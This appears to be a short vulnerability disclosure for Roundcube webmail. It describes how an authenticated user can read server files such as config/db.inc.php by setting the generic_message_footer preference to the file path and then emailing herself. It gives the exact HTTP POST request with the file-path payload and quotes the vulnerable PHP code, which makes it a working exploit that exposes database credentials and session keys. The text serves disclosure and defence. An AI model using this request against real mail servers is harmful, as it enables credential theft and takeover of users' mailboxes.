[RCD] zero day vulnerability (tested on v8.0 to 9.0)

Hacker first change value in user preference generic_message_footer to any file allowed to read roundcube (config/db.inc.php config/main.inc.php), after send herself message (with included config file). This allow view session crypto key, and db user and password. If at hosting installed phpmyadmin (mysql) or pgmyadmin (pgsql) and session saved in db, hacker get user mail login and password.

Finded in Russian tech blog (http://habrahabr.ru/post/174423/).

POST /?_task=settings&_action=save-pref&check_request=&_check_request= HTTP/1.1" 200 1133 "http://mail.ddos-guard.net/?_task=mail" "Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0" "_token=0f7c9ae8a387cb0bc5ce563fa09fe172&_session=generic_message_footer&_name=generic_message_footer&_value=config/db.inc.php

index.php:

else if ($RCMAIL->action == 'save-pref') { include INSTALL_PATH . 'program/steps/utils/save_pref.inc'; }

program/steps/utils/save_pref.inc:

$name = get_input_value('_name', RCUBE_INPUT_POST); $value = get_input_value('_value', RCUBE_INPUT_POST);

// save preference value $RCMAIL->user->save_prefs(array($name => $value));
//<--------- rewrite value

// update also session if requested if ($sessname = get_input_value('_session', RCUBE_INPUT_POST)) { // Support multidimensional arrays... $vars = explode('/', $sessname);

 // ... up to 3 levels
 if (count($vars) == 1)
     $_SESSION[$vars[0]] = $value;
 else if (count($vars) == 2)
     $_SESSION[$vars[0]][$vars[1]] = $value;
 else if (count($vars) == 3)
     $_SESSION[$vars[0]][$vars[1]][$vars[2]] = $value;

}

$OUTPUT->reset(); $OUTPUT->send();

program/steps/mail/sendmail.inc

// generic footer for all messages if ($isHtml && !empty($CONFIG['generic_message_footer_html'])) { $footer = file_get_contents(realpath($CONFIG['generic_message_footer_html']));
//<----- load file from value path $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset); } else if (!empty($CONFIG['generic_message_footer'])) { $footer = file_get_contents(realpath($CONFIG['generic_message_footer']));
//<----- load file from value path $footer = rcube_charset_convert($footer, RCMAIL_CHARSET, $message_charset); if ($isHtml) $footer = '<pre>'.$footer.'</pre>'; }